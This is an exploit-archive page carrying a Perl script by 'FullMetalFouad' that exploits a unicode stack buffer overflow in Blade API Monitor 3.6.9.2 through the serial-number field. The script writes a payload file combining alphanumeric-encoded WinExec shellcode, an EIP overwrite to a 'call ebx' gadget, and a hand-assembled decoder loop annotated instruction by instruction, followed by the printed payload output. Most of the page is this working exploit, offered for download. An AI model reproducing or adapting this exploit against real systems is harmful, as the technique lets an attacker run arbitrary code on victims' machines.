exploit the possibilities

Blade API Monitor 3.6.9.2 Buffer Overflow

Blade API Monitor 3.6.9.2 Buffer Overflow
Posted Jan 10, 2012
Authored by FullMetalFouad

Blade API Monitor version 3.6.9.2 unicode stack buffer overflow exploit.

tags | exploit, overflow
MD5 | 734fb399bee693d10f2b4503ed9abf75

Blade API Monitor 3.6.9.2 Buffer Overflow

Change Mirror Download
# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!) 
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################

my $file= "bof_blade.txt";

# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
"hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J".
"0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I".
"2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W".
"0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p".
"034r032m334t3w3m02";

#
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF" ;# sub eax, 30A
# "\x33\xDB" ;# xor ebx,ebx
# "\x33\xC9" ;# xor ecx,ecx
# "\xFE\xC5" ;# inc ch
#
# "\x43" ;# inc ebx
# "\x8A\x14\x58" ;# mov dl, [eax+ebx*2]
# "\x88\x14\x18" ;# mov [eax+ebx], dl
# "\xE2\xF7" ;# loop
# "\xFF\xE0" ;# jmp eax
my $shellcode = "hffffk4diFkTpk02Tpl0T0Bu".
"EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";


my $junk1 = "\xCC" x 104;
$junk1 = $junk1 ."\x35" x 2; # ECX
$junk1 = $junk1 ."\x41" x 6; # EBP

my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2 = "\x42" x 20;
my $buffer = "\x41" x 246;

my $finder = "";
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";

# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
# _part_0_:__________________________________________________
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xBA\x58\x58"; # | BA00580058 mov edx, 58005800 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5F"; # | 5F pop edi |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xB9\x3B\x3B"; # | B9003B003B mov ecx, 3B003B00 (diff) |
$part0 = $part0. "\xF5"; # | 00F5 add ch,dh |
$part0 = $part0. "\x6F"; # | 006F00 add [edi+0x0],ch |
$part0 = $part0. "\xD6"; # | D6 salc |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5B"; # | 5B pop ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x50"; # | 50 push eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xC1\x19"; # | C10019 rol dword ptr [eax], 19 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\xC7"; # | 00C7 add bh,al |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x52"; # | 52 push edx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
##################################### |__________________________________________________________|


# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
# _part_1_:__________________________________________________
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x5B"; # | 5B pop ebx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\x59"; # | 59 pop ecx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\xBA\x01\x41"; # | BA00010041 mov edx,0x41000100 |
$part1 = $part1. "\xF5"; # | 00F5 add ch,dh |
##################################### |__________________________________________________________|

# 2nd part : The patching of the 'loop code' :
# _part_2_:__________________________________________________
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x5A"; # | 5A pop edx |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x32"; # | C60032 mov byte [eax],0x32 ; 0x8A-0x58 |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x88 dh=58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x14"; # | C60014 mov byte [eax],0x14 ; 0x14 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\xE2"; # | C600E2 mov byte [eax],0xE2 ; 0xE2 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
# |__________________________________________________________|

# 3rd part : The loop code (stuffed with nulls of course)
# _part_3_:___________________________________________________
# | ; eax points to our shellcode |
# | ; ebx is 0x00000000 |
# | ; ecx is 0x00000500 (for example) |
# | |
# | label: |
$part3 = $part3. "\x43"; # | 43 inc ebx |
$part3 = $part3. "\x14"; # | 8A1458 mov byte dl,[eax+2*ebx] |
$part3 = $part3. "\x30\x18"; # | 881418 mov byte [eax+ebx],dl |
$part3 = $part3. "\xF7"; # | E2F7 loop label |
# |__________________________________________________________|

$finder = $part0.$part1.$part2.$part3;

open($FILE,">$file");
print $FILE $shellcode_calc.$junk1.$eip.$junk2.$finder.$shellcode."\xFF\xFF\xFF\xFF".$buffer."\x43\x43\x43\x43";
close($FILE);
print "File Created successfully\n";

# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC





Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close